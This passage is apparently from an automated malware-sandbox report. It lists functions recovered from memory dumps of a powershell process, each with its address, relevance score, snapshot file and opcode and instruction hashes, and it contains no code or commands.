                                                                                                                • Instruction Fuzzy Hash: F0310DB0B002099FDB48DFBAD4947AEBBF6AF89354F148069E505E7350EB349D418F51
                                                                                                                Function 040EE621 Relevance: .1, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 555e2ee98e17dc101744029ede37f6cb3abc39c59494729e168e03d171d90b8a
                                                                                                                • Instruction ID: 7aa98b578c642b0812b5ea175f268c2db00c3c35da787afb584dd043fb79db47
                                                                                                                • Opcode Fuzzy Hash: 555e2ee98e17dc101744029ede37f6cb3abc39c59494729e168e03d171d90b8a
                                                                                                                • Instruction Fuzzy Hash: B9313971A0060ADFDB14DF69D594A9EBBF2FF88304F148528D416BB390DB34AD45CB90
                                                                                                                Function 040EAD28 Relevance: .1, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 066f87172c087bbb6ddca9b5767530709f5067cea5958eee8b0a786a19964ead
                                                                                                                • Instruction ID: 4166fb36c8295f91ee8a6c9a455842a86ae8a0c976babf1d54cc47599869ea68
                                                                                                                • Opcode Fuzzy Hash: 066f87172c087bbb6ddca9b5767530709f5067cea5958eee8b0a786a19964ead
                                                                                                                • Instruction Fuzzy Hash: 3B3184B4A002499FEB05DFB4D855AFE77B6EF84304F1184A9D611BB394DB38AD418F60
                                                                                                                Function 040EAE70 Relevance: .1, Instructions: 84COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 400c36a73cf6f7044200be655568b34ea499da79346db31c3362fecc6844081e
                                                                                                                • Instruction ID: f1aaa0764cc89480c41453a5631c9aabebb3b89073282f4fcff0577df5d85fbb
                                                                                                                • Opcode Fuzzy Hash: 400c36a73cf6f7044200be655568b34ea499da79346db31c3362fecc6844081e
                                                                                                                • Instruction Fuzzy Hash: DB312D70B002099FDB48DFBAD4947BEBBF6AF89314F148069E505E7350EA349D418F51
                                                                                                                Function 040EE630 Relevance: .1, Instructions: 83COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0061c411d5f9c90b6601b35154f21f9e6c7513468e9f60f4786f0b6a429b2794
                                                                                                                • Instruction ID: f518a89fd1a579e5f4af11ec19c34f42f5055d5b348205d2626f05de2e0092d2
                                                                                                                • Opcode Fuzzy Hash: 0061c411d5f9c90b6601b35154f21f9e6c7513468e9f60f4786f0b6a429b2794
                                                                                                                • Instruction Fuzzy Hash: 21313871A0060ADFDB14DF69D594AAEBBF2FF88304F148528D416BB390DB38AD45CB90
                                                                                                                Function 040EAF98 Relevance: .1, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fac9d79781bf7df2d9fe5deb74393e8a97e8e930380ea338193e5f98587f2f33
                                                                                                                • Instruction ID: 38842ceefcdcdd2ab1be9f03593af9a99db8eaf94841c1ec4905960dea38cf7a
                                                                                                                • Opcode Fuzzy Hash: fac9d79781bf7df2d9fe5deb74393e8a97e8e930380ea338193e5f98587f2f33
                                                                                                                • Instruction Fuzzy Hash: F621DE71A042598FDB14DFAED844BAFBBF5EB88320F14846AD518A7340CB75A904CBA5
                                                                                                                Function 040EDFC0 Relevance: .1, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5734799fdb006f0de36d61ea07a55ee583078d1f48ed8034a4085e3eac7622d5
                                                                                                                • Instruction ID: c1cd05063ddfe012152bbf9eef1236f5f7977261210023cf653275b720e708f4
                                                                                                                • Opcode Fuzzy Hash: 5734799fdb006f0de36d61ea07a55ee583078d1f48ed8034a4085e3eac7622d5
                                                                                                                • Instruction Fuzzy Hash: F0314870A002158FDB14DF69D498BAEBBF6EF88314F144569D806FB390DB79AC81CB91
                                                                                                                Function 040E93F0 Relevance: .1, Instructions: 80COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 09e8759f494c1d285245236ce9e79163edfcfe0ecc8c4d3c9f1f849ac4526beb
                                                                                                                • Instruction ID: c2b7181aac0bd5ab5901239ae11dd5937070a28fb84e005bc29deccf1edbb0fc
                                                                                                                • Opcode Fuzzy Hash: 09e8759f494c1d285245236ce9e79163edfcfe0ecc8c4d3c9f1f849ac4526beb
                                                                                                                • Instruction Fuzzy Hash: 6431CCB29017449EEB60DF6AD0887DAFBF2EF88324F28C01AD81DA7204D7746491CB51
                                                                                                                Function 040EAD38 Relevance: .1, Instructions: 77COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 04436d2917f8bd2e18aaedfe47b0977cbaff92221d1bdac225ba339d1213bae0
                                                                                                                • Instruction ID: 74f7d33b39d5dc88148aac136938e545926f9d8c45c42316e23bc41f86fb7a1e
                                                                                                                • Opcode Fuzzy Hash: 04436d2917f8bd2e18aaedfe47b0977cbaff92221d1bdac225ba339d1213bae0
                                                                                                                • Instruction Fuzzy Hash: 8A3150B4A001099FEB04DBB4D855AFE77B6EF88304F118469D615BB394DB39AD428F90
                                                                                                                Function 040EDFD0 Relevance: .1, Instructions: 77COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0ac4b5ad103ea5a30ebea31d57a6e12869e64415ba548eef2bc266e05749757f
                                                                                                                • Instruction ID: e98c8f3ff353c170c8fa6c8209fc946eac1a7241ab73883d9621aa99d46bcfc5
                                                                                                                • Opcode Fuzzy Hash: 0ac4b5ad103ea5a30ebea31d57a6e12869e64415ba548eef2bc266e05749757f
                                                                                                                • Instruction Fuzzy Hash: 67314930A002198FDB14DF69D498AAEBBF6FF88314F144569D406FB390DB79AC81CB95
                                                                                                                Function 0402F3D8 Relevance: .1, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a4effe4f63f14642182d117154e1c1bfb78776b1bd02382ac4a0313ac7e32cba
                                                                                                                • Instruction ID: aef77770f92b75b286d7db5e8008c6338303fa95b06390a8e96e85b2324fca8a
                                                                                                                • Opcode Fuzzy Hash: a4effe4f63f14642182d117154e1c1bfb78776b1bd02382ac4a0313ac7e32cba
                                                                                                                • Instruction Fuzzy Hash: 7321F472600601EFDB05DF10DAC0B16BBB5FB88314F24C5ADE9095A296C376E456EBA2
                                                                                                                Function 06EC2700 Relevance: .1, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2298533561.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_6ec0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad46b5d1ef3c4f78e784913cbc552023682775557171adc89449b20ea275a102
                                                                                                                • Instruction ID: e8784907890a3a4009534d76b7273ea8290b9e3fc3c1609ed4db6a0c7d5b2b08
                                                                                                                • Opcode Fuzzy Hash: ad46b5d1ef3c4f78e784913cbc552023682775557171adc89449b20ea275a102
                                                                                                                • Instruction Fuzzy Hash: FC217135E00305DFEF908F59C685BAA77E1BB44335F04E06EEA049B290D334DA46DBA1
                                                                                                                Function 040ED270 Relevance: .1, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9ecf73b8d69d7eb821c28ba6d6f3faa5e39a7dbecbc382ec55575075e608f137
                                                                                                                • Instruction ID: a601048fdc9e00321ff249b996ef946dc5292ce6403fa5275473961508526ce6
                                                                                                                • Opcode Fuzzy Hash: 9ecf73b8d69d7eb821c28ba6d6f3faa5e39a7dbecbc382ec55575075e608f137
                                                                                                                • Instruction Fuzzy Hash: 64215EB0300206DFDB04DF7AD480A5ABBE6EF89258B108969D4199F351DB35E816CB94
                                                                                                                Function 0402F02C Relevance: .1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 894a4baf25b4933ae9c112a52bcccdb274443a04d758a2e7223e289ea01804c9
                                                                                                                • Instruction ID: 06c2f99c0f145cefb7f040b6c87ca9bfd7c6d133d758ce6a60861d5b6e54bf20
                                                                                                                • Opcode Fuzzy Hash: 894a4baf25b4933ae9c112a52bcccdb274443a04d758a2e7223e289ea01804c9
                                                                                                                • Instruction Fuzzy Hash: 63214671604201DFDB10DF24DAC0B16BBB1FB84314F20C66DDA0A5B282C33AE446EB62
                                                                                                                Function 040E9400 Relevance: .1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 29e21da4f242dd546bd9575d1c11a8f9fdf438d45e5c5521258199d2986d6c1c
                                                                                                                • Instruction ID: 11fd9e355fcb2a11e7e3d060bf457aceb6996bfc76056f22f85e9aa90a24425a
                                                                                                                • Opcode Fuzzy Hash: 29e21da4f242dd546bd9575d1c11a8f9fdf438d45e5c5521258199d2986d6c1c
                                                                                                                • Instruction Fuzzy Hash: E1219AB1A057449FEBA0DF6AC4887DAFBF2EB88314F28C01ED80DA7244D6746481CB61
                                                                                                                Function 040ED280 Relevance: .1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 617f68b91f98f4a0deadb5a383ad334b7337b545793e6fc6fc1ff14a611ce0e2
                                                                                                                • Instruction ID: 9e862db7415aadc05ac847e206014fe3d15940b6dc8c9bd8c073c8d3e6f4ff50
                                                                                                                • Opcode Fuzzy Hash: 617f68b91f98f4a0deadb5a383ad334b7337b545793e6fc6fc1ff14a611ce0e2
                                                                                                                • Instruction Fuzzy Hash: 12216AB0300205DFEB04DB7AD880A5ABBE6EF89218B00896DE4199B351DB35EC16CB90
                                                                                                                Function 040EE391 Relevance: .1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e93879ac56ccb9f0eb30d41c891f78c039eda4758a0eabf55bbd025d89e258ed
                                                                                                                • Instruction ID: 88ebf72a12b5f53235a42d73fb2cd3e752d720cb4af53aab5011000076a4f7d1
                                                                                                                • Opcode Fuzzy Hash: e93879ac56ccb9f0eb30d41c891f78c039eda4758a0eabf55bbd025d89e258ed
                                                                                                                • Instruction Fuzzy Hash: 96215EB0710206CFD710DF6ED59892ABBE6EF88304B158469E649DB365EB30EC11CB91
                                                                                                                Function 040EE3A0 Relevance: .1, Instructions: 65COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7c8df1f1d4e85f47f90bf0e1ab7388ff99b71c526f598e251b37867d19594947
                                                                                                                • Instruction ID: 0d94d53dc3774a0d88cf4e0f5dd99db5a8a802efbc7c14d5ed99ea417578e239
                                                                                                                • Opcode Fuzzy Hash: 7c8df1f1d4e85f47f90bf0e1ab7388ff99b71c526f598e251b37867d19594947
                                                                                                                • Instruction Fuzzy Hash: 71213AB4710205CFDB10DF6ED59892ABBE6EF883047158469EA49DB365EF30EC11CB91
                                                                                                                Function 040E767C Relevance: .1, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 69bb98a81a7c449bb46d11f0104d215dd165db5fe06833d25a5156277a51c767
                                                                                                                • Instruction ID: 6bfa48f8c16f18b9934dae7d7cdef781ab793d55a365fbd2e905bf0a1863a4ec
                                                                                                                • Opcode Fuzzy Hash: 69bb98a81a7c449bb46d11f0104d215dd165db5fe06833d25a5156277a51c767
                                                                                                                • Instruction Fuzzy Hash: D7112E79700118CFDB04DBA9E8409EDB7F6FBC8225B1440A5EA09EB765DB34ED118B90
                                                                                                                Function 0402F3D3 Relevance: .1, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fb17526de12952967cfdcac615b5ca24fffdce260a7db598cd55d241e967677f
                                                                                                                • Instruction ID: dbde46bd9e93b48ec56328532fda3c362af8b2b056c6ea53527498194ecf1471
                                                                                                                • Opcode Fuzzy Hash: fb17526de12952967cfdcac615b5ca24fffdce260a7db598cd55d241e967677f
                                                                                                                • Instruction Fuzzy Hash: 0621AC76504640DFCB06CF10DAC0B16BFB2FB88314F24C5A9D8094A296C37AD46ADB91
                                                                                                                Function 0402F027 Relevance: .1, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cb64d82e3e3395b3722d75eaabca4d455c753fc0b943a04ba5b7250a3fd7cc12
                                                                                                                • Instruction ID: 15d2c2a82a66f75e792f7475a1e1dad193b1768e69d68da8aa1200d88073a29a
                                                                                                                • Opcode Fuzzy Hash: cb64d82e3e3395b3722d75eaabca4d455c753fc0b943a04ba5b7250a3fd7cc12
                                                                                                                • Instruction Fuzzy Hash: B011DD75504280CFCB11CF10D6C0B15BFB1FB84328F28C6AED9094B696C33AE44ACB61
                                                                                                                Function 040E79C2 Relevance: .1, Instructions: 51COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a1fb9b1ac76d1f163ea4df9df8f4756245277572310145cd30c0f8e2ab68be91
                                                                                                                • Instruction ID: 8edd72be5bdb7311c3d54db9c6a7badbd7d7c9c54207cbe98ab65e5d83c33600
                                                                                                                • Opcode Fuzzy Hash: a1fb9b1ac76d1f163ea4df9df8f4756245277572310145cd30c0f8e2ab68be91
                                                                                                                • Instruction Fuzzy Hash: A6012B327083518FD751DBB5AC40ABF7BE6EF89225704056EE50DD7341EA35AD018360
                                                                                                                Function 040EBCE0 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8a97fb0c3fc1604e5b348c19d58899d265c7e775693f974f1899b95de413f0c5
                                                                                                                • Instruction ID: beaedf6a381987dbef27454df037c9d0cc58bbd15635a87a6f22f11309186e5c
                                                                                                                • Opcode Fuzzy Hash: 8a97fb0c3fc1604e5b348c19d58899d265c7e775693f974f1899b95de413f0c5
                                                                                                                • Instruction Fuzzy Hash: 8101DE316083408FD728DF3AC498AAA7FF1EF45210F1488AEE08AC76A2DB34F845C700
                                                                                                                Function 040EE5A8 Relevance: .0, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dd03f86fdd87b4e8ad438a1cfe765cf6d7fcc056214445e6b8d5c463e5e65006
                                                                                                                • Instruction ID: 15adf4c233f3d8dedd7551d2e971dfe156dfb653e62bed9de49a92522cf148a1
                                                                                                                • Opcode Fuzzy Hash: dd03f86fdd87b4e8ad438a1cfe765cf6d7fcc056214445e6b8d5c463e5e65006
                                                                                                                • Instruction Fuzzy Hash: 82110935204750CFC768DF79D08085ABBF6EF8931972489ADD04A877A0DB36E846CB50
                                                                                                                Function 040EDE98 Relevance: .0, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b39943b87e7a1eecce5d089a36120e3dcc656f6cbf523a3daa7dd5d246f7f3ef
                                                                                                                • Instruction ID: aceacdd06f8deaf78ed28e6a1d2d98e9b9db722034806405048da7e9bc643f9a
                                                                                                                • Opcode Fuzzy Hash: b39943b87e7a1eecce5d089a36120e3dcc656f6cbf523a3daa7dd5d246f7f3ef
                                                                                                                • Instruction Fuzzy Hash: E4017135B00214DFCB119F75E848AAEBBF5FF88319F144469E91AD3341DB36A911CB91
                                                                                                                Function 0402D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cb0bdd4cb6d4f863a0115c5272ab5405bb8691bb10f7f510990593dfda5ab7ee
                                                                                                                • Instruction ID: 0db2e1132b3b16a9d00483c04db9810b90054b8ebb5acda3f59ed61acdf84089
                                                                                                                • Opcode Fuzzy Hash: cb0bdd4cb6d4f863a0115c5272ab5405bb8691bb10f7f510990593dfda5ab7ee
                                                                                                                • Instruction Fuzzy Hash: 3D01F7315043559AE7504E25EAC0B67FFD8DF41324F18C019ED485B1D2C278EC42C6B2
                                                                                                                Function 0402D006 Relevance: .0, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2cc9002437bb89e2b4a4a061e2c013b835cc46dfa7d3f99f97944afe42cb73e7
                                                                                                                • Instruction ID: 0b1c789a4b5cc1f86e9166f617f6f155cc1262ad04cb574c3f5df0f6252eb643
                                                                                                                • Opcode Fuzzy Hash: 2cc9002437bb89e2b4a4a061e2c013b835cc46dfa7d3f99f97944afe42cb73e7
                                                                                                                • Instruction Fuzzy Hash: 46015E6140E3D09EE7128B25D994B62BFB4EF43224F1D80CBD9889F1A3C2699849C772
                                                                                                                Function 040E7958 Relevance: .0, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9b7b58837b9a4878e19177ccffad03542d3574f789238b5943b2bf70e0c110e6
                                                                                                                • Instruction ID: 4fcc9492552a9efaca2ff62e3473668d2407d2cc61b51f070d0cdfb607695871
                                                                                                                • Opcode Fuzzy Hash: 9b7b58837b9a4878e19177ccffad03542d3574f789238b5943b2bf70e0c110e6
                                                                                                                • Instruction Fuzzy Hash: 04F046317093129FE311A6B6AC409FF7BEADB892647040A2FE109C3642CE385C4183B0
                                                                                                                Function 040EBF10 Relevance: .0, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 04a3bc1521e5fb8a5a2141ce3cb97fca8206df6ebabfad14ca060ab54c644b9d
                                                                                                                • Instruction ID: 41015a51cf8ac81d9e0c36444d09750a235914b7745a3ff6f0adb840af1c80a1
                                                                                                                • Opcode Fuzzy Hash: 04a3bc1521e5fb8a5a2141ce3cb97fca8206df6ebabfad14ca060ab54c644b9d
                                                                                                                • Instruction Fuzzy Hash: EDF06D713052656FD7408A6A9C44ABBBFEDEF89621B14446AF944C7351DAB0D9108BA0
                                                                                                                Function 040EDCD9 Relevance: .0, Instructions: 41COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad03c1a242d6179b545ced2b435a4b94e8708b3215f9789addaefff3b42d9748
                                                                                                                • Instruction ID: 500cf2ab2e910ba01502e274ac8d613940f18b6db831598beb071f13b9b73f37
                                                                                                                • Opcode Fuzzy Hash: ad03c1a242d6179b545ced2b435a4b94e8708b3215f9789addaefff3b42d9748
                                                                                                                • Instruction Fuzzy Hash: F601DB71B041459FCB049F69D4544FDBFF5EF88320F14846AD506E7351EA319C21CB61
                                                                                                                Function 0402D9A7 Relevance: .0, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2268631425.000000000402D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0402D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_402d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
